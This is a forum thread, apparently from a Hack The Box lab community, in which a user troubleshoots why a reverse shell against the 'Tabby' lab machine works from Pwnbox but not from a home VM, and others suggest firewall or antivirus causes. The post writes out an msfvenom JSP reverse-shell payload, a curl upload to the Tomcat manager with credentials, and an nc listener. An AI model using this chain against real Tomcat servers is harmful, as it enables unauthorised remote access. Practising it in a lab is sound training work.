Question about the deployed reverse shell not working on my PC, while working while at PWNBOX.

Hello there!

I have a VIP+ membership/.

While on pwnbox, I can successfully deploy the reverse shell (on the tabby machine). While on my PC (even when I have succesfully connected to OpenVPN), I can not . It just hangs in there (Listening to any port), but it’s never able to connect, even if I trigger it, by entering the proper URL via a browser. Again, it’s totally working while on PWNBOX.

Does anybody know anything about that difference?

Is there a chance I might have something wrong on my end? For example, Bridged or Nat connection in the VM I use, or my antivirus/router blocking something? I can’t understand why it works on pwnbox, but not on my VM-Kali Linux machine.

For reference, my commands for the shell are the following:

msfvenom -p java/jsp_shell_reverse_tcp LHOST=MY_IP LPORT=9001 -f war > test.war

curl --user ‘tomcat:$3************123!’ --upload-file test.war http://10.10.10.194:8080//manager/text/deploy?path=/test.war

nc -lnvp 9001

Via a browser: http://10.10.10.194:8080/test.war

In pwnbox it works, while on my PC it does not.

@jotunr said:

Does anybody know anything about that difference?

The two most likely reasons are:

  • You’ve used the wrong IP in the msfvenom syntax
  • You have a firewall on your VM or host which is blocking the traffic (or host AV is dropping it)

I have the correct IP, so that leaves us with the other option.
I am thinking of disabling my antivirus, but isn’t there a security concern? I hope not.

@jotunr said:

I have the correct IP, so that leaves us with the other option.
I am thinking of disabling my antivirus, but isn’t there a security concern? I hope not.

It depends, no one else can threat model this for you.

Can you connect to you netcat listener from your host system?
Maybe try opening the address+port in your browser http://<ip-of-your-kali-vm-NOT-THE-VPN-ADDRESS>:9001/
If that doesn’t work, check your Kali’s firewall (iptables, nftables, whatever)